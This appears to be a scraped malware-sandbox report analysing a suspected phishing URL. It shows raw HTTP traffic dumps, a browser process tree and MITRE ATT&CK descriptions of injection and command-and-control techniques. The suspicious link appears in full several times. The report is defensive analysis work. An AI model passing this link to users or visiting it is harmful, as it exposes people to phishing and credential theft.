screen and (min-resolution:192dpi){#logo{background:url(//www
2024-08-28 11:32:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Static File Info

Network Behavior

Windows Analysis Report
https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:32:12 UTC	820	OUT	GET /recaptcha/api2/payload?p=06AFcWeA5fq74Km0ZGDuqNCU_pmYFf37TI-6A0_gAenwYHSbFYwCm6V_3S4vCnGn2b1XN7f20v0UeQgXaxsudYAYuVCO_prq-RRxqi4NetwtBUtCW86jSDVGhYj6e1ubgq0DosPP4k4pDhtK5hIAWIscploEbEiIvYplfKdG0wUzcDjW-sCksCBMzNNR2gRlb6bI3VFVuFCX20&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _GRECAPTCHA=09AM2HMKjSGX0bVN3CtRJHxJ8hI3XQBRlbnpoHDhDzoTqAHjQSwfZJvBS127XkYbnATdMcEtM869HBhnSibNTFB7c
2024-08-28 11:32:13 UTC	681	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Expires: Wed, 28 Aug 2024 11:32:13 GMT Date: Wed, 28 Aug 2024 11:32:13 GMT Cache-Control: private, max-age=30 Cross-Origin-Resource-Policy: same-site Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d" Transfer-Encoding: chunked Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-28 11:32:13 UTC	709	IN	Data Raw: 36 66 31 30 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 Data Ascii: 6f10JFIFC!"$"$C,,"}!1AQa"q
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: c1 38 ca ab 60 e4 0e bd f3 5d b7 e5 e8 72 28 df 72 7d 2f f6 9b 7d 36 e1 56 f3 c2 b3 a4 a9 82 e9 fd a0 32 38 e8 41 8e bd 97 e1 4f c4 3b 1f 8a ba 45 f6 ad 6b 61 2e 9d 25 9c cb 03 c4 ec 1c 3f cb 90 43 0c 0e fd 3f c6 be 28 f8 81 25 b5 cf 8b 6f 66 b2 6b 76 b6 22 31 19 85 86 cc 08 d4 71 83 ed 5f 44 7e cb 1e 23 d0 34 3f 86 af 06 a5 e2 3d 17 4e 9d b5 29 a4 30 5d df 47 0b 95 d8 80 30 0c 47 1f 29 e7 d8 d4 ab cb a6 a6 9b 1e f1 24 0f 18 c8 07 22 92 5b 49 a5 b7 92 62 b8 11 29 62 30 49 23 af 02 a9 d9 78 c3 c2 77 1f 30 f1 4e 81 2f 3d 53 52 84 ff 00 26 ad 47 f1 16 87 1c 13 32 eb 5a 5b c6 63 6c 08 ee 91 d8 9c 63 03 07 24 e7 b0 ac da 92 e8 52 b1 90 eb b0 e1 c1 43 e8 e3 69 fc 8d 0a 8b bb e6 1c 55 7d 1f c4 1a 67 88 da 5b dd 26 76 9e d5 59 a3 27 69 1b 58 12 30 73 f4 cf d0 8f Data Ascii: 8`]r(r}/}6V28AO;Eka.%?C?(%ofkv"1q_D~#4?=N)0]G0G)$"[Ib)b0I#xw0N/=SR&G2Z[clc$RCiU}g[&vY'iX0s
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: c1 c7 e7 83 f9 f4 df 13 fe 37 5a ea 57 52 e9 3a 56 8d ba d6 2b b5 3e 74 f3 8d 97 68 01 65 60 98 0c 30 ca 0f 53 d3 07 d2 bc 52 5d 32 d9 be 78 a5 8d 14 f6 f9 88 ff 00 eb 53 24 b1 49 23 11 dc 4f 1c a8 a7 20 15 3b 94 fa 83 d6 89 6a b4 1d 99 dd 6a 1e 2d 0f a6 45 2c 36 16 68 92 49 fb a9 1c 62 45 04 9d c1 4a 9d c3 27 bf 38 fc 6b 1b e2 a7 8d 7c 49 ae 5f 5a 5a b0 68 ad ac 94 47 69 1d b8 63 b1 00 03 25 86 03 13 d3 3e dd 05 72 d2 5b cf 03 80 25 56 84 10 c0 05 e7 23 a5 4a 24 67 7c b3 16 27 a9 3c d7 34 a5 25 a1 a4 61 cc b5 3b 3f 85 ba 9e b9 af fc 49 d1 ce b6 d3 5d da db 6e 6c ce df bb 85 42 1c 1d a7 80 32 17 8e 99 ae ab c6 7e 26 9b c3 9f 13 6f ae 6d ae fc eb 79 bc 97 65 82 64 21 94 22 2b 72 b9 01 be 5c 60 8e 83 e9 5e 52 d2 a4 36 ff 00 33 1f 32 4e bb 7f 85 7e be a6 89 Data Ascii: 7ZWR:V+>the`0SR]2xS$I#O ;jj-E,6hIbEJ'8k\|I_ZZhGic%>r[%V#J$g\|'<4%a;?I]nlB2~&omyed!"+r\`^R632N~
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: 87 d3 39 15 27 8c ec 0c 3a e6 83 11 7d db b4 a8 9c fb ee 89 5b fa d5 0b ab 61 1c 04 8f 94 e4 72 28 93 9f 30 59 58 b3 26 bb 6d 32 85 5b 0b 86 c8 c6 e6 2a b4 7d ba eb 49 bf 31 db ae 10 80 cd 19 25 95 b2 33 d3 1c 1f 71 59 f0 23 79 40 97 7e 25 23 ef 1e 98 5a d9 d6 9e 09 d2 e1 e2 60 fe 5e d8 db 8e 8c 31 91 4d 42 4f 5e a2 e6 48 e6 35 75 d5 af b5 4b 8b b8 65 b4 b7 8e 57 ca a0 86 52 40 c6 39 21 80 27 8e b8 aa 67 4e d6 7a 9b fb 6c ff 00 d7 09 bf f8 ba e8 20 b5 5b 8b 26 2d 24 51 20 76 cb c8 d8 03 85 fc 4f e1 5a d6 b0 86 b5 84 9e 9b 47 e3 c5 0a 13 7d 46 a6 8f 37 bd 17 f6 f7 f1 59 4d 7f 68 4c 8a 58 fe e6 6c a8 ec 48 df df a5 36 25 da bb e7 96 36 01 db 71 45 28 36 8c 6d c0 3c f3 93 df 3c 1a 87 c5 b2 c9 63 a9 49 2a a6 e8 cd cc ab 2f af 1b 71 fa 1c 7f 9e 1f 1d d4 77 10 Data Ascii: 9':}[ar(0YX&m2[}I1%3qY#y@~%#Z`^1MBO^H5uKeWR@9!'gNzl [&-$Q vOZG}F7YMhLXlH6%6qE(6m<<cI/qw
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: 8d 9f 52 bb f9 a3 1f 76 52 3b 91 db e9 52 35 f6 a2 d1 01 f6 db a3 86 39 fd eb 77 03 1d fd 8d 40 22 91 a3 4d a8 c4 64 a8 c0 eb 8e 7f ad 68 e9 9a 36 a5 7a c2 28 6c 2e 64 2c c3 18 8c f2 79 1f d6 a2 fa ea 3d 0a 26 5b 99 55 3c d9 a5 7d b9 51 bd 89 ef 9e ff 00 5a d7 b1 06 4f 0c dd 46 a4 6e 8a e5 5c 1e b8 0c a5 6a 7b cf 08 eb f6 53 3d b5 de 99 3d bc aa 48 db 30 d8 47 e0 6a de 87 a2 5f 5a da 5f 41 75 1a b7 9d 1a 15 44 3b 8e 54 93 43 d6 21 73 8e b6 52 56 45 5e 59 80 50 3f 11 57 ac 0e c8 99 48 e4 39 a6 db c0 ed 1c ec bb 58 c7 07 99 91 f2 91 83 d7 dc f3 5a 3e 1f d3 ae af ac 0c f0 db 99 47 98 41 38 3d 78 f4 a4 e4 96 e5 1d fa 59 24 4e 59 64 b8 72 46 3f 79 3b b8 fc 89 22 b9 8f 1a 43 2a dc 5b ca 63 fd c9 56 5d fd 81 e0 81 f5 eb f9 57 5c ff 00 33 00 4e 2a 67 b1 b6 d4 2c Data Ascii: RvR;R59w@"Mdh6z(l.d,y=&[U<}QZOFn\j{S==H0Gj_Z_AuD;TC!sRVE^YP?WH9XZ>GA8=xY$NYdrF?y;"C[cV]W\3Ng,
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: c7 c9 8e 9f a8 ad 8d 2a 5f 0a d8 22 59 69 f7 32 cc d1 c6 54 b4 2f d3 71 25 82 9e 71 c8 ff 00 74 7d 72 6b 46 c7 c2 3f 09 62 74 f3 75 bd 72 e8 20 f9 c4 36 ec 9b cf b9 64 fe 58 af 77 2a 72 97 3a 8a 7d 3f 50 92 56 3c a8 4c c1 02 75 50 73 8c 77 a0 48 4f 50 bc fb 7f 9f 5a f7 7d 22 3f 83 5a 78 76 93 c2 17 57 05 64 2a 8d 3c 92 c9 b8 7a 91 9c 0c f3 c6 2b a0 b0 f1 77 c2 0b 36 18 f0 15 a8 03 b9 d3 55 ff 00 52 a4 d7 a8 e9 d6 ec 66 a3 e6 7c d3 f7 b9 20 13 eb 8a f4 bd 17 44 b2 7d 3e ce da e2 ca 39 e5 44 c7 cc 32 72 79 23 f3 35 ee da d7 8d 3e 18 e8 56 70 c9 2f 84 f4 74 9a 71 fb 9b 6f b2 45 e6 37 e1 8f f0 1e f5 8f a0 fc 5b d0 75 0f 13 dd 68 f1 f8 1f 4b b3 ba 82 0f 3e 07 74 8f 12 80 46 7e ea 9c 1e 7d 4d 65 05 35 7b a3 45 4e da dc f2 9d 5f 43 d3 ad 5d 05 d6 95 02 32 ae 11 Data Ascii: _"Yi2T/q%qt}rkF?btur 6dXwr:}?PV<LuPswHOPZ}"?ZxvWd*<z+w6URf\| D}>9D2ry#5>Vp/tqoE7[uhK>tF~}Me5{EN_C]2
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: 8c b6 59 b6 96 e3 f8 b8 3c 9c 8f a5 78 ae 15 25 51 ce 6b 45 f2 25 b2 9d cf 86 95 bc 2e fa c3 df 28 9b 6a 3e d1 22 ac 71 00 00 c3 8e b9 03 3d 49 c6 3a f3 5c 37 99 34 05 a4 b5 50 6d d0 e0 4f 08 c1 24 fd d2 47 50 33 c7 f3 3d 45 77 3a dd 86 a5 71 a6 4a b2 5a 3a da b1 dc 62 32 06 38 51 8d b9 3d 7e e9 1f 52 2b 93 d6 a3 9e ce f3 ca b3 bb 9e 29 fc c4 9c b4 72 6c d8 57 ee 9c f4 ce 79 1f 4a da 95 39 24 db 69 dd fd de 42 6b a9 bf 67 e2 b8 e3 b5 b0 8c 5a ca af 6b fb b1 1c 64 96 ea 14 94 1e a7 79 e3 ae 3f 3a bb e1 5d 3a c3 51 d2 ae ee e3 b8 be 80 0b 92 f2 92 4c 92 15 4e 78 da 0f ca e3 20 f3 d8 9e 98 ae 16 d9 67 b4 d5 6d 4b f9 72 a1 20 2b 29 2d 92 c4 e5 fd ce 33 8c f7 f4 c5 4d a4 dd 5f 5b 5e 5d c3 67 79 22 c7 73 b8 48 08 0a 76 9c 80 79 e3 b9 e9 db 3c d2 f6 1b f2 82 4d Data Ascii: Y<x%QkE%.(j>"q=I:\74PmO$GP3=Ew:qJZ:b28Q=~R+)rlWyJ9$iBkgZkdy?:]:QLNx gmKr +)-3M_[^]gy"sHvy<M
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: a7 97 e0 16 8b 3c fa 7f 87 17 30 15 67 b1 bb 71 9e 0c 53 ab ff 00 40 6b 13 e2 0c 16 51 e9 16 f2 5b 40 22 90 5e 2e 46 f6 d9 f7 5b f8 4e 57 f4 af 77 d3 75 2d 3a f3 0d 6f 7b 0b 93 d0 03 83 f9 1c 57 84 7c 40 bb 9b 4f d2 96 ea 0d 85 e2 bb 18 de 32 39 57 1f d6 bb 70 b4 a3 4e ee 2e f7 26 49 2d 8e 5d 6e 16 1d 01 60 f3 00 17 57 60 39 56 c7 dc 92 26 5c 71 d8 16 f4 af 5d f1 4d c2 25 9c 52 13 f2 ad c1 c9 03 24 02 5b b5 79 b4 44 6a bf 0b e5 bf 79 22 5b f8 2e ae 65 74 8d 40 2c 8b 1c 25 32 3a 81 90 d8 3e c6 bb af 12 c9 15 d6 80 97 00 11 1b 48 1c 7a 60 9e ff 00 f7 d5 12 49 36 bc ff 00 30 b5 8c 6b fd 6a 4b 59 24 1e 4c d8 43 8c 1f 2e 30 7f ef a2 2b 2e 5f 13 dc 94 2c ff 00 60 56 e7 68 37 a8 ec 7f e0 2b 93 f8 54 f2 68 f2 5c cc 97 36 36 8c 77 af 26 28 17 83 d7 ef 2c 4c 7d 7b Data Ascii: <0gqS@kQ[@"^.F[NWwu-:o{W\|@O29WpN.&I-]n`W`9V&\q]M%R$[yDjy"[.et@,%2:>Hz`I60kjKY$LC.0+._,`Vh7+Th\66w&(,L}{
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: 4e 46 46 41 19 a7 f5 7a 4b ec fe 65 a4 ba 1e 67 a9 6a fe 07 4b 17 96 d7 c5 12 4d 77 91 b2 dd 34 f6 00 9e ff 00 31 6f e9 5a cb a1 4c a6 dd ee 2f c2 db cd 18 91 65 48 cb 05 ca ee 00 f3 c7 a1 ae a5 7c 1f e0 d8 6e d6 e1 34 4b 05 94 1f ee 12 33 fe e9 e3 f4 af 41 d2 fc 49 aa db 45 1d 95 b6 9f 61 75 1a 0c 08 cc 6c 09 03 e8 71 ff 00 8e 9a 7e c2 87 44 4f 2d 9e a8 f1 cb 7f 0d 69 93 20 77 f1 1c 00 e7 95 31 1e 07 e7 55 ae 7c 3d a7 99 9e 08 75 b4 95 82 6e 53 f6 7c 06 3c e4 67 71 e7 d3 d7 35 ed 52 f8 f6 df 4f 1f be f0 6d e4 27 3f 3b db 3a 4a 9e e7 6f 1f c8 55 8d 2f c5 5e 0f d5 ed a4 fb 1b db 43 3c 4b ba 46 fe cf 9a de 58 89 e3 3b c0 3d f1 de 9b c3 51 7b 2f cc a8 c6 1d 51 e4 2f e0 d4 d2 74 07 d5 af 9e 2b d6 4e 4d b4 37 48 18 8c ff 00 74 64 fb d7 17 ae f8 be e6 d1 44 5a Data Ascii: NFFAzKegjKMw41oZL/eH\|n4K3AIEaulq~DO-i w1U\|=unS\|<gq5ROm'?;:JoU/^C<KFX;=Q{/Q/t+NM7HtdDZ
2024-08-28 11:32:13 UTC	1390	IN	Data Raw: 4c b1 5e db 1b 81 81 36 c9 80 7c fb e0 e6 bc 93 c3 7e 34 82 c3 4a 31 eb 77 37 77 96 91 80 1b cf b3 0b b7 a6 3e 64 6c 9f c7 35 61 75 7f 84 fa 84 e6 ea 48 ad e3 95 88 3b d8 c8 a7 35 83 4d 3d 8d d6 1a 4f 67 f8 9e b6 87 4d f2 f6 c9 70 18 f5 05 e4 0c c3 db 27 9a 47 55 2a ad 6d 7d 0b 95 3b b6 3c 83 8f c7 d3 f3 ae 0e 29 7c 0f 74 17 ec 97 9a 79 1e 8b 70 db c7 e3 ba b6 7e c9 65 3d bf fa 3a c0 cb eb e5 bb e4 7a 7d ea 97 22 d6 0e 4c e8 65 d6 c0 94 2e a9 70 aa a9 d0 a8 de 01 ed cf a7 d7 14 7d ba d9 65 37 36 97 7e 43 90 72 d1 cb e5 b1 3d bf 0f 6e 6b 9d 6d 27 7c 61 2d e1 b2 85 57 24 09 61 3c fe 66 99 3e 8d 33 aa ab 5a e9 4e 0a 91 8f b3 46 d9 fd 73 9a 77 ee 27 85 9a d8 bb ad cf 7b 73 78 ba c4 d2 89 96 15 1b 56 23 16 d6 7e 01 21 4e 01 38 3e 95 91 e2 5f 11 6b 9a d5 b3 e9 Data Ascii: L^6\|~4J1w7w>dl5auH;5M=OgMp'GU*m};<)\|typ~e=:z}"Le.p}e76~Cr=nkm'\|a-W$a<f>3ZNFsw'{sxV#~!N8>_k

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:32:33 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WLmPEdGXKfswU18&MD=Elb1RbNs HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-08-28 11:32:34 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 3dbb2cc8-3702-4fa9-903d-036e81343229 MS-RequestId: 0643309a-001d-43ef-9750-4b1e2c719ffe MS-CV: CvhrerSf5kCchUeT.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 28 Aug 2024 11:32:33 GMT Connection: close Content-Length: 30005
2024-08-28 11:32:34 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-08-28 11:32:34 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	07:31:33
Start date:	28/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	07:31:37
Start date:	28/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1984,i,5261450469489560156,4049961592972443817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	07:31:39
Start date:	28/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ="
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre